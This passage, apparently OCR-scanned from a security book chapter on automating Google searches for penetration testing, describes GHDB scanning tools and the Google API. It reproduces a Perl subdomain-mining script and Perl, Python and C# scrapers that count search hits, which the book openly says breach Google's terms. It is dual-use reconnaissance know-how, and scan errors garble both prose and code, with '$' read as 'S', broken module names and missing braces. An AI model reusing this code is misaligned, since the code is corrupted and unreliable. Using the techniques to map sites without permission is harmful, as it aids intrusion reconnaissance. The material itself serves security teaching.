tedious, you'll need to consider an automation tool. A step above the site technique is Athena. Athena reads the fuU contents of the GHDB and allows you to step through each query, applying a site value to each search. This allows you to step through the comprehensive list of "bad searches" to see if your site is affected. Athena does not use the Google API but is not automated in the truest sense of the word. SiteDigger by Foundstone is automated, and a GHDB config file is available, giving you access to the latest hacking queries. SiteDigger has a nice reporting feature and uses the Google API, making it a friendlier alternative to the non-API tools. Gooscan is potentially the biggest Google automation offender when used improperly, since it is built on the GHDB and wiU crank through the entire GHDB in fairly short order. It does not use the Google API, and Google wiU most certainly notice you using it in its wide-open configura- tion. This type of usage is not recommended, since Google could make for a nasty enemy, but when Gooscan is used with discretion and respect for the spirit of Google's no-automation rule, it is a most thorough automated tool. As far as overall usefuUness, we like Wikto. It allows for Google scanning functionality ('legal', via the API) and also incorporates a slew of host scan- ning features backed by the Nikto database. www. syngress.com Chapter 12 Automating Google Searches III by James C. Foster Solutions in this Chapter: i Understanding Google Search Criteria " Und^tanding the Google API . Understanding Google Automation LrtTraries^ Scanning the Web with Google Attack Libraries Links to Sites / ' '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 363 -1 364 Chapter 12 • Automating Google Searches Introduction In a relatively short time, Google has become one of the largest collections of information in the world — certainly one of the largest ireely available on the Internet. Outside the corporate anomaly and considering its founders and go-to- market strategy, it is nothing short of amazing that this Internet search power- house has become the de facto standard for searching the Internet for desired information. That said, Google's collected information has become more sought after than the proprietary Web-crawling algorithms, massive storage techniques, or information retrieval system that seems to oifer up the requested search infor- mation in mere nanoseconds. Similar to nearly all other high-technology industries, the niche information security industry continues to assimilate advanced algorithms for the quick deter- mination of more accurate information. Expert systems, artificial intelligence, dynamic database-driven applications, and profiling are four of the overarching initiatives that are currently driving the security applications to the next level of automated computation. Numerous mechanisms exist for collecting information fi^om Google's online index of Web sites. Throughout this chapter, we discuss multiple methods for retrieving information from Google's database, including an overview of Google's API and manual Web page scraping. Manual Web page scraping is the technique of pulling out desired information fi^om a returned Web page after a query is sent. These page-scraping techniques are quickly gaining in popularity and are currently being utilized in a number of security, information-gathering, and other gimmick search engines. Although the underlying algorithm is nearly iden- tical, the particular implementations of the search algorithm are quite different when written in different programming languages. Last but not least, we discuss how ethical automated scanning applications can be written that do not abuse the Google site by bombarding it with queries. This wiU be our equivalent to show how page-scraping applications can be written from a "white-hat" perspec- tive. A note of caution: This chapter is written for programmers. You'll need a background in various programming languages to get the most fr^om this chapter. Simpler code examples are used throughout this book. www. syngress.com Automating Google Searches • Chapter 12 365 Wa rning! 1 Google's stance on automation is that Google does not approve of auto- mated scanning outside its provided Google API. Utilizing manual page- ^ scraping techniques violates Google's terms of service; therefore, all the ' information in this book is provided for educational purposes. The code and libraries included in this chapter were developed as prototypes and are meant to serve as examples only! Please review Google's Standard Terms and Conditions for the company's current searching policy. Understanding Google Search Criteria As you have learned, Google provides access to an extremely large database of information ascertained from online applications and Web sites. As an end user, you have the ability to query this information in two general ways. The first is through the common search interface located on the main page at www.google.com. In general, this mechanism utiUzes one or multiple words (or strings) and returns a list of the highest-rated sites with these strings. The other, less common mechanism is the advanced search page that resides on the Google Web site in a somewhat hidden form. Here is a direct Web link to the advanced Google search page in EngUsh: www.google.com/advanced_search?hl=en. Advanced Google querying not only aids in our cause of retrieving sensitive information from the Google database, it also helps educate users on the dangers of storing potentially sensitive information on distributed applications or Web applications. This chapter dives into these intricacies. A NOTJ Google searching parameters are covered in detail in Chapter 1. Please refer to Chapter 1 for more information on specific Google searching parameters. Results from advanced and complex Google queries can be captured in one of two ways. The first and easiest is to grab results straight from a browser's address bar after the query is submitted to Google. Another method for obtaining the fuU query is to utilize a network traffic analyzer or sniffer. www. syngress.com 366 Chapter 12 • Automating Google Searches Our recommended sniffer is Ethereal (www.ethereal.org). The newer versions of Ethereal can convert HTTP to ASCII, minimizing the manual conversion necessary to enable humans to read the queries. An advanced Google query looking for exploits is shown in Figure 12.1. Figure 1 2.1 Programmatic Yet Not Automatic Advanced Google Querying ©Google Advanced Search - Microsoft Internet Explorer File Edit View Favorites lools Help A Back 0 ' B S /^search ^Favorites ^1 ^ Address ^ httpi/Zwww. google. comyadvanced_search?hl=en Google - (exploits perl "#l/usr/bln" [vj gfe 5earch Web ' ^ ^ 52 blocked -g) AutoFill I g Options ^ 0 exploits : Links 3 pel GotJgle Advanced Search Advanced Search Tips | Abcut Gcocile Find results with all of the words with the exact phrase exploits 10 results 3 #!/usr/bin ~| [ Google Search with at least one of the words perl without the words Languaye Return pages written in any language |v| jpile Format Only |v| return results of the file format lany format Date Return web pages updated in the past 3 months | v| Numeric Range Return web pages containing numbers between 1 Slid 1 1 Occurrences Return results where my terms occur anywhere in the page | v| Domain Don't 1^1 return results from the site or domain .edu 1 e. a. aooale. com. . ora Mors info SafeSearch ® No filterinci O Filter usinci SafeSearch Running an advanced query utilizing the previous Google-supplied form is not a difficult task when you are seeking information or contacts on a specific subject. Although the results of an advanced query, shown in Figure 12.2, are easy to read from a human perspective, it's quite different from a programmatic stand- point. The real issue of this seemingly simple task is magnified when you want to query Google 10,000 times and log the results for later correlation, analysis, or www. syngress.com Automating Google Searches • Chapter 12 367 reporting. At that point, automating the transmission and reception of the Google queries is no longer an option — it's mandatory. Figure 12.2 Formalized Yet Not So Normalized Advanced Google Query Google Search: exploits perl "i^l/usr/bin" -sitei.edu - Microsoft Internet Explorer B[B]i Back - Address |^ hl:tp://Hwi^,google,i Google- err'#!/u;ribin"-;il:i Search Web = 10&hl=enabtn<5=<5oogle+5earch&gs_ep q=%£3%£l%gFu^r|^| Q Go \ Links ■ ^ & 52 blocked g Options (Sj exploits g] pei Google sifplolts perl "tfi/usr/bir" -site' ^ I past 3 months p] [ Searcti | j Web Results 1 - 10 af about 4,570 aver the past 3 months for exploits perl "Wl/usr/hin" -site:.e(lii (0.25 secends) SecurlTeam.cQin ™ (PowerFTP Directoiy Traversal and DoS ... ... DOS AUTOEXEC. DOS CONFIG. DOS VIDEOROM.BIN CONFIG.SYS DBLSPACE.BIN MSDOS.SYS MSDOS.-- SETUPLOG.TXT WINDOWS lesl.lrt.txl Exploit: #!/iisr/biii/perl # Simple script ... w n'll - 17k - Cached - Similar pages SecuriTeam.com "^'^ (WebStore Remote Command Execution) ... Exploit: #!/UBr/b in/perl -w#Sun, May 6, 20D1 #e>:ploil by Igor Dobrowtski, naident@my-deja com #The exploit is for the default set-up. ... www securiteam com/ejiploiti^5WP0B0U4kA html - 17k - Cached - Similar pages [ Mor s fmm PRIVATEI - RESEARCHI - PRIVATEI - RESEARCHI - PRIVATEI vux[vux ... ... 2 EXPLOITS, ESpico.c (C], ESpico.pl [PERL) ON TTY2I DURING THIS TIME MY SYSTEM FUCKED UP BUT NOW IT'S OKI NOT FOR KIDDQZIi [d^@linu>;:-]t Is -I /iisi/Uiii/pico ... K-QTik : Multiple Cisco Products Vulnerabilitigs Exploit (Cisco ... Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter] #!/ii3r/biii/perl Cisco Global Exploiler Legal notes . #The BlackAngels ... wwvv.k-oiik.com/eK|H - ' nilar pages K-Otik Securit\f Cdrecord Version == 2.0 Mandrake local root ... ... Version T^T Disporibie ici ' #!/usr/ bin/perl ##### Cdrecord versior 2.0 and < local root eiiploit. ... www.k-otik.com/exploils^]5 14.priv8cdr.pl php- 15k- Cached - Similar pages [ More results fram \ww.k-Ptik.cam ] Re: Digital Unix4.0 exploitable buffer overflows ... foo > inc: usage: inc [+falder] [switches] > % /usr/bin/mh/inc +foo -audit 'perl -e 'print ... grace periotJ between posting the announcement and the exploits. ... cert.uni-sluttgart.de/archive/ bugtraq/1 999y01/msg00404.html - 8k - Cached - Similar paces [ packet storm ]:. - http //paoketstorrnsecurity org/ ... Exploits the nispath buffer overflow. ... It is used by troff-to-ps.fpi as uid Ip when perl, troff and LPRng are ... Description' /iisi/Mn/pileup local root exploit ... Viww.packs' - .jj. .r . [ packet storm ]:. - hittp://p a cketstorm security org/ ... Description: Packet Storm new exploits for May, 2001 . ... Description: This little piece of perl code tries to ... Description: DOS package v3 2.7 [/usr/bin/dsh] local ... www packets1ormsecuri1y.org.fD105-exploi1s?- 43k - Cached - Gimilar pages [ More results from \ww.packetstonnsecurity.org ] As an additional note, the latest version of Ethereal incorporated an extremely useful feature: cut and paste. You are now able to cut and paste raw packet or ASCII-converted information straight from the Ethereal analysis pane into com- puter memory for later use. Gaining access to packet data in older versions of Ethereal was a cumbersome task that included saving captured streams in .PCAP format, then later manually converting data into a straight text form from .PCAP. www.syngress.com 368 Chapter 12 • Automating Google Searches Analyzing the Business Requirements for Black Hat Auto-Googling Although we won't attempt to justify the absolute need to automate Google querying and page scraping here, we wiU point out that it's illegal, unethical, and in some cases, as in securing your Web site or customer's Web site, unavoidably necessary. Google sets limitations that limit your true ability to monitor your Web applications with complete visibility. That said, we wiU demonstrate techniques that can be implemented to "more ethically" automatically query Google or avoid the dreaded (and alleged) Google IP blacklist. (Supposedly, a "living" Google blacklist exists to log and limit Google service offenders, whether human or Web bot.) The following is a list of self-governing Google pen-testing ethics: ■ Implement sleep timers in your applications that wiU not affect Google's response time on a global level. For instance, do not send 10,000 Google queries as fast as you can write them to the wire; sleep for 2 or 3 sec- onds between each transmission. ■ Do not simply mirror aged Google results. Better to link queries to real- time results than to create an aged database of results that needs constant updating. ■ Test or query with permission ascertained from the "target" site. Query intelligently, thereby minimizing the number of queries sent to Google. If you have a blanket database that you fire against all sites on Google, even though half are irrelevant, you're unnecessarily abusing the system. Why scan for Linux-based CGI vulnerabilities if the target applications or organization only implement Windows systems? More information on Google lockouts can be found in the article located at www.bmedia.org/archives/00000109.php. Google Terms and Conditions The following are important links to Google's official terms and conditions as they pertain to this book and chapter: www. syngress.com Automating Google Searches • Chapter 12 369 ■ Standard Searching Service Terms and Agreements www.google.com/terms_ofLservice.html ■ Google API Service Terms and Agreements www.google.com/ apis/ api_terms.html Understanding the Google API The Google API or development kit was created for programmers who want to interface with Google's online "googleplex" of data. The API is a fuUy supported set of API calls that can be accessed or leveraged in multiple languages. The most common language to hook into the Google development API is Microsoft C# for .NET. Unfortunately, you cannot simply read a document on the API set and begin to code. You must complete a few steps before you'll be able to utilize the Google API. As a quick note, do not bet on beating the system's 1000 queries per day. When you use the Google API, each query is accompanied by the Google API key. A local Google cache database keeps track of each key usage to ensure that on any sUding 24-hour scale, a key is not sent more than 1000 times. The following steps outline Googling as Google intended: 1. Download the development kit at www.google.com/apis/ 2. Register to create a new Google API developer account: ■ www.google.com/ accounts/NewAccount?continue=http:// api. google. com/createkey&followup=http://api. google.com/createkey. ■ Be prepared to provide your e-mail address, which will end up being your username, and a secure password, as shown in Figure 12.3. Note You will be required to verify the supplied e-mail address before your account license will be created and sent to you. www. syngress.com 370 Chapter 12 • Automating Google Searches Figure 12.3 Creating a Google Development API Account J Google Accounts - Microsoft Internet Explorer File Edit View Favorites Tools Help ©Back - 0 ■ a a ft| jDa„„h -^Favonte -©I ^ www. syngress.com 376 Chapter 12 • Automating Google Searches ■ Reading Google API Results Responses The following is a list of the Google API results that can be ascertained from the supplied methods. Each of these properties can be directly accessed once a Google search request has been successfully completed: ■ ■ <URL> As we have discussed, the Google Development APIs come with a slew of limitations. From a developer's perspective, some of these limitations are more apparent and devastating than others. For instance, the weU-known 1000 queries will limit your abiHty to fuUy test your Google footprint; however, the maximum 10 results per query will also limit your ability to potentially test or fingerprint the Internet for certain vulnerabilities. The fuU listing of Google API limitations as seen by Google Labs is displayed in Table 12.6. www. syngress.com Automating Google Searches • Chapter 12 377 Table 12.6 Google API Limitations Component Limitation Search request length 2048 bytes Maximum words utilized to form 10 a query Maximum sites (site) in a query 1 Maximum results per query 10 Maximum results 1000 Sample API Code Before we dig into the API code, we must meet a few requirements that are common to most Perl-based Google querying scripts. These are the same requirements we covered in Chapter 4, but we'U list them again for convenience. In order to use this tool, you must first obtain a Google API key from www.google.com/apis. Download the developer's kit, copying the GoogleSearch.wsdl file into the same directory as this script. Next, download and install the expat package from sourceforge.net/projects/expat.This installation will require a ./configure and a make as is typical with most modern UNIX- based installers. This script also uses SOAP::Lite, which is easiest to install via CPAN. Simply run CPAN from your favorite flavor of UNIX, and issue the fol- lowing commands from the CPAN shell to install SOAP::Lite and various dependencies (some of which may not be absolutely necessary on your plat- form) : install LWP : : UserAgent install XML:: Parser install MIME :: Parser force install SOAP:: Lite This script was written by RoelofTemmingh from SensePost (www.sense- post.com). SensePost uses this tool as part of their footprinting process which really accentuates the power of Google for reconnaissance purposes. For more information about their techniques, try Googling for sensepost tea or sense- post obvious. The first hit for these searches brings up two excellent papers that are a great read filled with excellent information. www. syngress.com 378 Chapter 12 • Automating Google Searches The script, called dns-mine.pl is listed below: # ! /usr/bin/perl # # Google DNS name / sub domain miner # SensePost Research 2003 # roelof@sensepost.com # # Assumes the GoogleSearch . wsdl file is in same directory # #Section 1 use SOAP: :Lite; if ( $#ARGV<0 ) {die "perl dns-mine.pl domainnameXne . g . perl dns-mine.pl cnn . com\n" ; } my $company = $ARGV[0]; ####### You want to edit these four lines: ############## $key = " YOUR GOOGLE API KEY HERE " ; @randomwords= ( "site" , "web" , "document" , "internet" , "link" , "about" , $company) ; my $service = SOAP :: Lite->service (' file :. /GoogleSearch . wsdl ') ; my $numloops = 3 ; #number of pages - max 100 ######################################################### tSection 2 ## Loop through all the words to overcome Google's 1000 hit limit foreach $randomword ( Srandomwords ) { print "\nAdding word [ $randomword] \n" ; #method 1 my $query = "$randomword $company -www. $company" ; push Sallsites , DoGoogle ( $key , $query , $company) ; #method 2 my $query = " -www. $company $randomword site : $company " ; push Sallsites , DoGoogle ( $key , $query , Scompany) ; WWW. syngress.com Automating Google Searches • Chapter 12 379 } #Section 3 ## Remove duplicates @allsites=dedupe ( Sallsites ) ; print STDOUT "\n \nDNS names : \n \n"; foreach $site (Sallsites) { print STDOUT "$site\n"; } #Section 4 ## Check for subdomains foreach $site (Sallsites) { my $splitter=" . " . $company; my ( $f rontpart , $backpart ) = split (/$splitter/,$site) ; if ($frontpart =~ /\./){ Ssubs=split ( / \ . / , $f rontpart ) ; my $temp= " " ; for (my $i=l; $i<=$#subs; $i++){ $temp=$temp . ( Ssubs [ $i ] . " . " ) ; } push Sallsubs , $temp . $company ; } } print STDOUT "\n \nSub domains : \n \n"; Sallsubs=dedupe ( Sallsubs ) ; foreach $sub (Sallsubs) { print STDOUT "$sub\n"; } ttSection 5 ############ subs ########## sub dedupe { my (Skeywords) = S_; www.syngress.com 380 Chapter 12 • Automating Google Searches my %hash = ( ) ; foreach (gkeywords) { $_ =~ tr/ [A-Z] / [a-z] /; chomp ; if ( length ($_) >1) {$hash{$_} = $_; } } return keys %hash; #Section 6 sub parseURL{ my ( $site , $company) =@_; if (length($site) >0) { if ($site =~ / :\/\/ ( [\ .\w]+) [\ :\/] /) { my $mined=$l; if ($mined =~/$company/ ) { return $mined; } } } return " " ; #Section 7 sub DoGoogle{ my ( SGoogleKey , $GoogleQuery , $company) =@_; my @GoogleDomains= " " ; for ($j=0; $ j<$numloops; $j++){ print STDERR "$j " ; my $results = $service -> doGoogleSearch ($GoogleKey, $GoogleQuery , (10*$ j ) , 10 , "true" , " " , "true" , " " , " latin 1" , "latinl" ) ; my $re=(@{$results-> {result Elements } } ) ; foreach my $results (@{$results->{resultElements} } ) { my $site=$results->{URL} ; WWW. syngress.com Automating Google Searches • Chapter 12 381 my $dnsnaine=parseURL ( $site, Scompany) ; if ( length ( $dnsname) >0 ) { push ©GoogleDomains , $dnsname ; } } if ($re !=10) {last; } } return ©GoogleDomains ; } Source Documentation The Google_DNS_Mine Perl script utilizes the Google Development API through the Perl SOAP module. The script was created to identify and retrieve all of the sub domains and DNS names associated with a particular parent web site. The links and strings retrieved would be extremely useful for anyone seeking to identify directories, CGI bins, or sub domains that could be later utilized or leverage when penetration testing. Section 1 is utilized to declare the variables and arrays for the script in addi- tion to specifying the modules required. The second section of the script loops through the random word engine querying Google for multiple search terms. All sites and sub-domains that are found within the response pages are then pushed to an associative array (@allsites) . The random words, company, and key variables were defined in section 1. The third section of the script was created for ease of use and educational purposes only. It serves two purposes. The first is to call the subfunction dedupeQ that removes duplicate sites from the array then prints each unique site to STDOUT. The sites that are printed to STDOUT during this section are full strings that still contain the parent strings. Section 4 splits the entire retrieved strings from the Google responses to con- tain only sub-domains. Once the subdomains are properly stripped and for- matted, they are pushed to the @allsubs array then in the same manner covered in Section 3 are removed of duplicates and printed to STDOUT. The fifth section contains the dedupeQ function which removes all of the duplicates for subdomains. The passed array is converted from the memory resi- dent bufier to the @keywords array. Each keyword in the array is then converted to lowercase and the carriage return is removed. The hashes are then compared and returned in a hash table. The sixth section parses out all of the URL infor- www. syngress.com 382 Chapter 12 • Automating Google Searches mation from the returned Google strings. The memory buffer is parsed into a site variable and company variable which is then utilized to determine the length of the site string. The company variable is later utilized to help slice the pertinent URL string before returning the "mined" string. The last section of this script contains the bulk of the Google API code required to execute the query on the remote system. The subfunction accepts the GoogleKey, GoogleQuery and company variables. The my Sresults line executes the Google query utilizing the SOAP service and corresponding method doGoogleSearch. The results are then parsed and pushed to the @GoogleDomains array before being returned back to the calling fianction. When run, the tool launches multiple Google queries (built from the (^rand- words list) that locate domain names and subdomains nested in Google result fields. These names and subdomains are output to the screen. For example, run- ning the tool against Google.com produces the following output: DNS names : news . google . com. au catalogs . google . com www. cantfindongoogle . com toolbar . google . com services . google . com news . google . com labsl . google . com gmail . google . com adwords . google . com labs . google . com f roogle . google . com api . google . com print . google . com answers . google . com desktop . google . com local . google . com directory. google . com WWW. syngress.com Automating Google Searches • Chapter 12 383 Sub domains : cantfindo . google . com This tool provides excellent mapping data for a penetration test, and the results can be extended by increasing the Snumloops variable. Tools and Traps... Foundstone's SiteDigger Kudos to the Foundstone consulting team for their slick Windows inter- face for assessing Web sites. Their tool "plays by the rules," since they do require you to obtain a Google developer license key to power the scan- ning portion of the application. The upside to this method and to utilizing this tool is that you are doing no wrong (provided that you have permis- sion to query-bang a site); the downside is that you are limited to 1000 queries per day. As you can imagine, these 1000 queries could go rather quickly if you were to scan more than one site or if you wanted to run multiple scans on an individual site. It is only a matter of time until the GoogleDork DB is larger than 1000 queries. This tool can be downloaded from Foundstone's homepage at www.foundstone.com under the Resources link. Foundstone's SiteDigger Win32 interface is shown in Figure 12.5. Also consider the Wikto tool from SensePost, (www.sense- post.com), which allows for Google searching and more specific Web server testing. www.syngress.com 384 Chapter 12 • Automating Google Searches Figure 12.5 SiteDigger Win32 Interface Foundstone SileDi^er v1 .0 File Optioi Foundstone | SiteOit;eer' Results I Signatures! |l Search 1 Slop 1 Enport Results Categorj^: ERROR MESSAtSES Result: httD://w'A'w-3Q6.ibm.com/sQftware/data/irlQrmi^/Dub£/librar;'/rotes/relrotes/C23Ci047.html Not Foundn Checking for: inurl tech-support inurl show Cisco site www umd.edun Not FoLinciD Done IE Enter Google license kej: ||OWQFHKVEpURi^gMz3PCW3SioC Understanding Google Attack Libraries Google attack libraries refer to our (Google Pen Testers) code that has been cre- ated to aid in the development of education about applications and tools that query the Google database, retrieve results, and scrap through those results. At the onset of this endeavor, we decided that we should first create a list of goals that we want our codebase to adhere to, as well as a list of challenges that we should acknowledge: 1 . Execute queries against the Google database without using it's Google Development API. 2. Retrieve specific results from the executed Google queries. 3. Parse and scrap through results to provide useful information to the calling program. 4. Utilize components in the particular implementations that use the inherent advantages of each language. 5. Code efficiently. www. syngress.com Automating Google Searches • Chapter 12 385 PitfaUs: 1. Inaccurate development could lead to poor results. 2. Avoid unstable response parsing that is too static to interpret atypical Google page responses. 3. Avoid lengthy or buggy socket code that utilizes too many socket con- nections or does not close them at the appropriate times. 4. Avoid poor query cannon development that will not handle complex or lengthy Google queries. Pseudocoding The concept of pseudocoding software or a tool before you start developing is something that is regularly taught in college courses as well as embraced in the commercial software development world. One popular form of this practice is creating a Unified Modeling Language (UML) diagram. UML is most com- monly utilized in developing object-oriented software, but it can also be used to create even the smallest of tools. More commonly than UML and a predecessor is the ever-present graphical flowchart depicting the overarching processes and components that, housed together, collectively make up an application. One of our goals is to discuss different implementations for automating Google queries and the minute or large differences between the languages. Before we dive into the implementations, let's describe the overall process to achieve our Google Query Library goals in a software process flow diagram. See Figure 12.6. Figure 12.6 Google Query Library Process Initialize Send Google Socket Request Retrieve Google Response t t Return Scrap Google Total Hits Response www. syngress.com 386 Chapter 12 • Automating Google Searches The Google attack libraries are divided into five overarching categories that wiU commonly be included within all the different language implementations: ■ Socket initialization This is the first category, starting left to right.. Each of the different language implementations will create and establish a socket that will then be utilized to transfer and receive data irom Google. ■ Send a Google request or query Following the arrows, this is the second milestone. Notice that submilestones not mentioned include ascertaining the query and formatting potential arguments within that query. ■ Retrieve the Google response generated from your query This response will contain several sets or (carriage-returned lines) of informa- tion; most important, it wiU include the total number of hits your query generated. Other bits of information that we are currently less interested in include Web sites and the fuU URLs for the responses. ■ Scrape or separate The fourth process will be to scrape or separate the useful desired information irom the less useful and commonly over- whelming amount of information that Google returns on the main pages in response to search requests. In this case, we will search for a "of about" string that precedes the total hits count for the page. It will act as a landmark for us, helping pinpoint the location of the total hits number. ■ Return the total number of hits Last but certainly not least, we will return the total number of hits that the query generated to the calling location within the script or program. This allows us to create flexible code that can be further extended at a later time or included within a larger pen-testing script or program. Perl Implementation The following Perl implementation has very little debug code and was created to depict how easy it is to automate custom querying on Google and page scraping within ascertained Web pages. The code is divided into three main components. The first is a dump of the source, second is the script's execution output, and lastly is documentation for the script's logic and code implementation. www. syngress.com Automating Google Searches • Chapter 12 387 GOOGLE PERL . PL SOURCE #Section 1 #Google Hacking in Perl #Written by Foster # ! /usr/bin/perl -w use 10 : : Socket ; ttSection 2 $query = ' / search?hl=en&q=dog ' ; $server = 'www.google.com'; $port = 80; ttSection 3 ############################# sub socketInit() { $socket = 10: : Socket :: INET->new ( Proto => ' tcp ' , PeerAddr => Sserver, Peer Port => Sport, Timeout => 10, unless ($socket) { die ("Could not connect to Sserver : $port " ) } $socket->autoflush ( 1 ) #Section 4 ############################ sub s endQuery ( $ ) { www.syngress.com 388 Chapter 12 • Automating Google Searches my ($myquery) = ©_; print $socket ("GET $myquery HTTP/1 . 0\n\n" ) ; while ($line = <$socket>) { if ($line =~ /Results . *of\sabout/ ) { return $line; } } } #Section 5 ############################ sub getTotalHits ( $ ) { my ($ourline) = @_; $hits=" " ; $inciex = index ( $ourline, "of about"); $str = substr ( $ourline , $index, 30); @buf =split ( / / , $str ) ; for ($i = 0; $i < 30; $i++) { if ($buf[$i] =~ /[0-9]/) { $hits=$hits . $buf [$i] ; } } return $hits; } ############################ #Section 6 socketlnit ( ) ; $string = sendQuery ( $query) ; $totalhits = getTotalHits ($string) ; WWW. syngress.com Automating Google Searches • Chapter 12 389 ttPrinting to STDOUT the Total Hits Retrieved from Google print ( $totalhits ) ; Output when you execute the previous Perl script with the embedded Google Attack Libraries, you will receive the following standard out (STDOUT). The output represents the total number of Google pages that are returned with the submitted query: %GABE%\ perl google_perl.pl $GABE%\ 53400000 Source Documentation The first section of this program, or Section 1, contains the header information for the script. It contains the local directory in which the Perl executable is stored, along with the socket module initialization. Section 2 sets the three global variables that are required to test these Google Attack Libraries using a live example against Google.com. The first is the query that will be passed to the functions later down the line. If you need to automate these functions as a part of a larger Google scanning application, they could be replaced with a looping mechanism to pass multiple queries to the Google Attack Library functions. The second variable stores Google's server address or domain name and the corresponding port it resides on. We realize we could have hardcoded the port number to 80, but to make the code more flexible the vari- ables are left as dynamic. The first function in our Perl example contains our socketlnit function. The initial part creates the socket structure with the corresponding protocol, server address, port, and socket timeout value. The TCP protocol was utilized, not HTTP. The HTTP protocol wiU be manually created and forced onto the wire. The unless function attempts to establish the socket. If the unless function is unsuccessful, it wiU exit the program with the die statement and print an error message to the screen. The last line "autoflushes" the data from the socket to pre- pare for data transmission. The fourth section is the sendQuery function. This function requires one parameter, the query that you want to run on Google. The parameter is stored in memory on the first line and saved to the local Smyquery variable. The second line in the parameter writes the HTTP request to the socket, which contains the www. syngress.com 390 Chapter 12 • Automating Google Searches desired query. The while loop is utilized to read in each line of the multiple lines, one at a time, for the Google page's response. The encapsulated IF statement is used to find the line that contains the total hit count by referencing an "about" string that is always found on the Google page. Once that line is identified, it is returned to the calling function. Section 5 is the meat of the script, containing all the page-scraping code. It also takes in one parameter, stores it in memory, then stores it to the local scope variable Sourline. The global Shits variable is initialized and will later be used to store the total number of Google hits before it is returned. The indexQ line finds the numerical location of the string "of about", which is located right before the totals hits on the response page of a Google query. The next line then utilizes the substrQ function to grab 30 characters, starting at the index location. (The total hits number will be included as a part of those 30 characters.) The looping con- struct underneath is then utilized to grab all digits from that string and store them into the $hits variable. Lastly, the $hits variable is returned to the calling function location. Section 6 comprises four main components. The first component calls the socket initialization function. The second line is subdivided into two parts. The right side of the equal sign is utilized to call the sendQuery function with the desired query. In the case of a Google Pen Tester, this query could be a CGI scan, exploit search, or aUinurl: vulnerability scan. Whatever the search, the response of that search is saved in the $string variable. That $string variable is then passed to the getTotalhits function. The total number of hits is stored in the new $totalhits variable, then printed to stardard out (STDOUT) via the last Hne of the program. Python Implementation The Python language proved an extremely efficient language in regard to number of lines of code to reach success. Not only was it easy to write due to the object- oriented nature of Python, but few actual lines of code were needed to obtain the results we were looking for. When you compare the Python code to that of the Perl code, you wiU undoubtedly notice a few key differences. For instance, in the Python code, we strip out digits using a regular expression instead of parsing through a looping construct. The other major difference is that we have encapsu- lated our socket establishment code within try /except blocks. These blocks aid in exception handling and debugging if there is an error. www. syngress.com Automating Google Searches • Chapter 12 391 This was hands-down our favorite Google Query Library — two thumbs up for object-oriented scripting languages. Included in this example is our source, output, and source documentation. Source #Google Hacking in Python #Written by Foster #Section 1 import socket import sys import re #Regular Expression Module #Section 2 HOST = 'www.google.com' # The remote host PORT =80 # The same port as used by the server s = None query = " /search?hl=en&q=dog" #Section 3 for res in socket . getaddrinfo (HOST, PORT, socket .AF_UNSPEC, socket . SOCK_STREAM) : af, socktype, proto, canonname, sa = res try: s = socket . socket (af , socktype, proto) except socket . error , msg: s = None continue try: s . connect (sa) except socket . error , msg: s . close ( ) s = None continue break if s is None: print ' could not open socket ' www.syngress.com 392 Chapter 12 • Automating Google Searches sys . exit ( 1 ) ttSection 4 s. send ("GET " +querY+ " HTTP/1 . 0\n\n" ) myindex = 0 while myindex < 1: data = s.recv(8096) myindex = data .find (" about " ) s . close ( ) #Section 5 mysubstr = data [ myindex : myindex + 30 ] regexObj = re . compile (' \d ' ) list = regexObj .findall (mysubstr) totalHits = ' ' .join(list) print totalHits Output The following output represents the corresponding total hits retrieved from Google: 53500000 Source Documentation The first section of the Python script, Section 1, defines the modules that are required to run the script. It uses Import to allow the script access to particular objects and methods. Section 2 contains our four global variables that we have become accustomed to declaring in the beginning of our examples. They include our socket object, host, port, and query variables. The third section contains aU our socket initialization code. It creates the appropriate socket structure on line one. The two try /except blocks encapsulate the socket creation and connection code. If the except statements are executed, the corresponding error messages will be output to STDOUT. If a socket could not be created at aU, the debug message "Could not open socket" wiU be sent to STDOUT. Section 4 is utilized to both send the Google query and store the appropriate Google response. The first line of code writes the HTTP request to the socket. www. syngress.com Automating Google Searches • Chapter 12 393 The myindex variable is initially declared to zero because it will be utilized as our counter to determine when we receive the Google response line with our total hits number. Since Google responses are sent in a series of text lines, we must loop through each individually until the desired line is in the memory buffer. The WJiile loop is utilized to loop through the response strings, and once the "about" string is identified, it sets the value myindex to a number greater than one, thereby causing the loop to break. Lastly, the socket is closed. The last section of this script is Section 5. The first line of code utilizes the index ascertained in Section 4 to grab a 30-character slice of the complete Google response. The total hits number is encapsulated within this 30-character string. The second line compiles a regular expression to identify all digits within a particular string. The Findall method is then utilized to create a list of the digits within the slice. The list is then converted back to a string using the Join method before being printed to STD OUT on the last line of the script. Extending this script to scrape sites that are included in Google's responses or the specific URL hits contained in the response is not terribly difficult; however, it does add another layer of complexity. We would only need to create a looping structure, then implement a regular expression engine to search out URL-like strings within the response page. Once they're retrieved, the option exists to print them to standard out or push them to an associative array. Chapter 10 has more information on utilizing regular expressions within Google searches. C# Implementation (.NET) C#, pronounced C sharp, is a much different beast when it comes to imple- menting Google attack libraries within applications or automated penetration testing tools. First, the entire language was created in an object-oriented manner for object-oriented programming (OOP) developers. As you will see in our code demonstration, the previous concept of an attack function utilized in the Perl example no longer exists. Instead we have created a .NET C# object that con- tains the functionality for auto-querying Google, scraping the page results, then returning the number of total hits for any specified query. Since this example has the same output as the Perl example, we have alleviated that section and only provided the source along with its documentation. GOOGLE_CSHARPE . CS SOURCE //Google Hacking in C# //Written by the master BW WWW. syngress.com 394 Chapter 12 • Automating Google Searches using System; using System. Text ; using System. Text . RegularExpressions ; using System. Net; using System. Net . Sockets; namespace ConsoleApplication2 { class GoogleQuery { //Required Socket Variables private const string query private const string server private const int port = 80; private Socket socket; //Method #1 public void SocketInit() { socket = new Socket (AddressFamily . InterNetwork, SocketType . Stream, ProtocolType . Tcp) ; IPHostEntry ipHostlnfo = Dns . Resolve ( server ) ; IPAddress ipAddress = ipHostlnfo . AddressList [ 0 ] ; socket . Connect (new IPEndPoint ( ipAddress , port)); } //Method #2 public void SendQuery ( ) { socket . Send (ASCIIEncoding. ASCII .GetBytes (string . Format ( "GET {0} HTTP/1 . 0\n\n" , query))); } //Method #3 public string GetTotalHits ( ) { " /search?hl=en&q=dog" ; = "www.google.com"; WWW. syngress.com Automating Google Searches • Chapter 12 // receive the total page byte [ ] buffer = null; byte[] chunk = new byte [4096], • try { while (socket .Receive (chunk) > 0) { byte [ ] tmp = new byte [ (buff er == null ? 0 : buf fer . Length) chunk . Length] ; if (buffer != null) buffer.CopyTo(tmp, 0 ) ; chunk . CopyTo ( 